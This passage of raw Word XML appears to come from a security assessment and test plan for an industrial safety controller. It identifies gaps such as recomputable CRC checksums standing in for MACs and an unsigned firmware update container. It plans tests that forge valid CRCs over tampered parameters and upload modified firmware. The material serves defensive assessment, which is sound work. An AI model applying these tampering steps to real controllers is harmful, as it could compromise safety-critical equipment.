        </w:rPr>
        <w:t xml:space="preserve"> EC3 on mismatch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2964EFE6" w14:textId="1D9D144B"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Certified CRC-Tool (T2, TÜV Süd):  iParCRC generation (SRIO-9023).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20541FD3" w14:textId="5030CC57"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Dual SCPU cross-check + STL</w:t>
      </w:r>
      <w:r w:rsidR="00676CAE" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1oo2 diversity + STM32F7 self-test library + startup tests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5655B040" w14:textId="26E2D710"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FW update behind firewall - Environmental (SRIO-1196): compensating, not a device function.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20353F24" w14:textId="5DF3B376" w:rsidR="009C170F" w:rsidRPr="006D5B99" w:rsidRDefault="009C170F" w:rsidP="009C170F">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Update container = unsigned BLOB: Stated for completeness, this is the deficiency, not a control (SRIO-2953).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B3663D" w14:textId="77777777" w:rsidR="002805D3" w:rsidRPr="006D5B99" w:rsidRDefault="007F5A7B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rStyle w:val="Fett"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Identified Gap: </w:t>
      </w:r>
      <w:r w:rsidR="0024048B" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3301E60F" w14:textId="236A3289" w:rsidR="002805D3" w:rsidRPr="006D5B99" w:rsidRDefault="007207C9">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-1 (Part B</w:t>
      </w:r>
      <w:r w:rsidR="00E509A6" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">): iParCRC/F_ParCRC are checksums, not MACs; public seed/layout, 16-bit F_ParCRC </w:t>
      </w:r>
      <w:r w:rsidR="00E509A6" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00E509A6" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> recomputable </w:t>
      </w:r>
      <w:r w:rsidR="00E509A6" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:sym w:font="Wingdings" w:char="F0E0"/>
      </w:r>
      <w:r w:rsidR="00E509A6" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> intentional parameter corruption undetected. Same class as RQ-002</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21EB152D" w14:textId="7510D08B" w:rsidR="007207C9" w:rsidRPr="006D5B99" w:rsidRDefault="00B054CC" w:rsidP="001F0FC0">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>G-2 (Part D)</w:t>
      </w:r>
      <w:r w:rsidR="001F0FC0" w:rsidRPr="006D5B99">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6D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41772E88" w14:textId="0BA42CDB" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00F2706B">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">G-3. </w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">A deliberate, </w:t>
      </w:r>
      <w:r w:rsidR="00774FEA" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>identical</w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> malicious modification applied to both channels </w:t>
      </w:r>
      <w:r w:rsidR="00334A6F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">(dual-SCPU cross-check and the STL) </w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">is a </w:t>
      </w:r>
      <w:r w:rsidR="00334A6F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>systematic</w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidR="00334A6F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>coherent</w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> change</w:t>
      </w:r>
      <w:r w:rsidR="00334A6F" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>,</w:t>
      </w:r>
      <w:r w:rsidR="00337326" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> the two channels still agree, the cross-comparison passes, and the STL sees a consistent (though malicious) image. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="133F8BFF" w14:textId="58DEC1E3" w:rsidR="0012676E" w:rsidRPr="006D5B99" w:rsidRDefault="00337326" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Hence safety integrity mechanisms provide no SECURITY authenticity: they cannot distinguish a genuine image from a coherently</w:t>
      </w:r>
      <w:r w:rsidR="00272EBC" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>tampered one. That is precisely what a signed-image / secure-boot mechanism (EDR 3.14) would catch.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F27562" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E6E10B5" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0C7DCD8B" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1275030A" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2763970C" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="348CE32E" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="77ED93ED" w14:textId="77777777" w:rsidR="00161A4E" w:rsidRPr="006D5B99" w:rsidRDefault="00161A4E" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="01CE5E60" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5FDA0EEE" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="63B2616A" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="118D8C74" w14:textId="77777777" w:rsidR="00A74ABB" w:rsidRPr="006D5B99" w:rsidRDefault="00A74ABB" w:rsidP="00A74ABB">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:ind w:left="1440"/>
        <w:rPr>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="13F58A6E" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 2: Methodological Test Planning</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DCC4F6A"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6D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="16D8924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D6FC78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1445EF1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9F31568"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="240A61DF" w14:textId="115153E8" w:rsidR="00900880" w:rsidRPr="006D5B99"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Verify iParCRC/F_ParCRC rejection of a mismatched configuration (references TC-RQ002-01)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3D595B30" w14:textId="028CC758" w:rsidR="00900880" w:rsidRPr="006D5B99"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3.4 in normal operation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="280C1C9A" w14:textId="61AFC2F6" w:rsidR="00900880" w:rsidRPr="006D5B99"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73B20374" w14:textId="21FFA53D"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="23102EB0" w14:textId="77777777" w:rsidR="004B55FC"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Recompute valid iParCRC/F_ParCRC over modified parameters; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="12A2681B" w14:textId="5465E86C" w:rsidR="00900880" w:rsidRPr="006D5B99"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 xml:space="preserve">inject </w:t>
            </w:r>
            <w:r w:rsidR="00CA255E" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:sym w:font="Wingdings" w:char="F0E0"/>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> accepted</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="7B8086FB" w14:textId="426376E1" w:rsidR="00900880" w:rsidRPr="006D5B99"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(Part B)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="478D1E79" w14:textId="77777777" w:rsidR="00962ABB"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ATT&amp;CK for ICS T0836</w:t>
            </w:r>
            <w:r w:rsidR="00962ABB" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="0CC74DB6" w14:textId="63C99605" w:rsidR="00900880" w:rsidRPr="006D5B99"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NIST SP 800-115 §5.2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="54FD02C7" w14:textId="42F0F6CF" w:rsidR="00900880" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00900880" w:rsidP="005C021F">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6F42AB52" w14:textId="77777777" w:rsidR="00242F5A"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Upload a modified/unsigned firmware BLOB; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="7850645D" w14:textId="52DC7A0A" w:rsidR="00900880" w:rsidRPr="006D5B99"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confirm no signature/integrity verification before install</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="3F273C7F" w14:textId="7CD46097" w:rsidR="00900880" w:rsidRPr="006D5B99"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(Part D)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="4AD358FF" w14:textId="77777777" w:rsidR="002A3D2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ISTG-FW[UPDT]-CRYPT-001/004;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="597FB018" w14:textId="230D2864" w:rsidR="00242F5A"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FSTM Stage 7;</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:color w:val="FF0000"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="5F489F97" w14:textId="6FA83195" w:rsidR="00900880" w:rsidRPr="006D5B99"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MITRE </w:t>
            </w:r>
            <w:r w:rsidR="00942AD6" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>T1693.001</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="001F3A54" w14:textId="6A0AF843" w:rsidR="00900880" w:rsidRPr="006D5B99"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B13FB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="009B13FB" w:rsidP="009B13FB">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>4</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="09AD472D" w14:textId="421324DF"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Obtain the update image/BLOB; static analysis for signature/header + binary-hardening review</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="57903448" w14:textId="737A6284"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Characterizes absence of signing / secure-boot artefacts</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="39225B30" w14:textId="613F79E7"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3</w:t>
            </w:r>
            <w:r w:rsidR="00CA0401" w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t xml:space="preserve"> -</w:t>
            </w:r>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>5;</w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="52328B11" w14:textId="76111661"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CM-008</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="780DEE01" w14:textId="08946E32" w:rsidR="009B13FB" w:rsidRPr="006D5B99"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B13FB" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="00CD1539" w:rsidP="009B13FB">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:t>5</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="3969" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5C487556" w14:textId="3BF356C9" w:rsidR="009B13FB" w:rsidRPr="006D5B99"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Analytical: argue why 1oo2 cross-check + STL cannot detect a coherent tamper; cross-reference Test 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="1872" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="62CA5695" w14:textId="6A853CA1" w:rsidR="009B13FB" w:rsidRPr="006D5B99"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Substantiates G-3 (Self-test </w:t>
            </w:r>
            <m:oMath>
              <m:r>
                <w:rPr>
                  <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                  <w:lang w:val="en-US"/>
                </w:rPr>
                <m:t>≠</m:t>
              </m:r>
            </m:oMath>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>authenticity)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2097" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="5F547F6C" w14:textId="77777777" w:rsidR="00A51738"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Requirements/architecture analysis; </w:t>
            </w:r>
          </w:p>
          <w:p w14:paraId="07687304" w14:textId="50C98DDF"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IEC 61508 vs. 62443 integrity distinction</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="958" w:type="dxa"/>
          </w:tcPr>
          <w:p w14:paraId="6D16951D" w14:textId="52CC7405" w:rsidR="009B13FB" w:rsidRPr="006D5B99"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4D110E9C" w14:textId="5A7E5B07" w:rsidR="00A51738" w:rsidRPr="006D5B99"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6D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BA1A017" w14:textId="77777777" w:rsidR="00161A4E" w:rsidRPr="006D5B99" w:rsidRDefault="00161A4E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="038D4677" w14:textId="77777777" w:rsidR="00161A4E" w:rsidRPr="006D5B99" w:rsidRDefault="00161A4E" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="148302C4" w14:textId="77777777" w:rsidR="009C0A46" w:rsidRPr="006D5B99" w:rsidRDefault="009C0A46" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Step 3 - Two-Level Test Catalog</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AD2890B" w14:textId="77777777" w:rsidR="00376E64" w:rsidRPr="006D5B99" w:rsidRDefault="00376E64" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="594DD37A" w14:textId="314536FC" w:rsidR="00376E64" w:rsidRPr="006D5B99" w:rsidRDefault="00376E64" w:rsidP="009C0A46">
      <w:pPr>
        <w:pStyle w:val="KeinLeerraum"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>TC-RQ005-0</w:t>
      </w:r>
      <w:r w:rsidR="00E83DE4" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>1</w:t>
      </w:r>
      <w:r w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> -  </w:t>
      </w:r>
      <w:r w:rsidR="006B7350" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Parameter Integrity-Value Rejection </w:t>
      </w:r>
      <w:r w:rsidR="006B7350" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math" w:cs="Cambria Math"/>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>⇄</w:t>
      </w:r>
      <w:r w:rsidR="006B7350" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve"> TC-</w:t>
      </w:r>
      <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>RQ</w:t>
      </w:r>
      <w:r w:rsidR="006B7350" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>002-</w:t>
      </w:r>
      <w:r w:rsidR="00B82652" w:rsidRPr="006D5B99">
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:highlight w:val="yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>01</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2305ED90"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6D5B99"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6D5B99" w:rsidRDefault="008151FA" w:rsidP="007A6444">
            <w:pPr>
              <w:pStyle w:val="KeinLeerraum"/>
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
            </w:pPr>
            <w:r w:rsidRPr="006D5B99">
              <w:rPr>
                <w:b w:val="0"/>
                <w:bCs w:val="0"/>
                <w:lang w:val="en-US"/>
              </w:rPr>
              <w:t>Field</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7762" w:type="dxa"/>
          </w:tcPr>
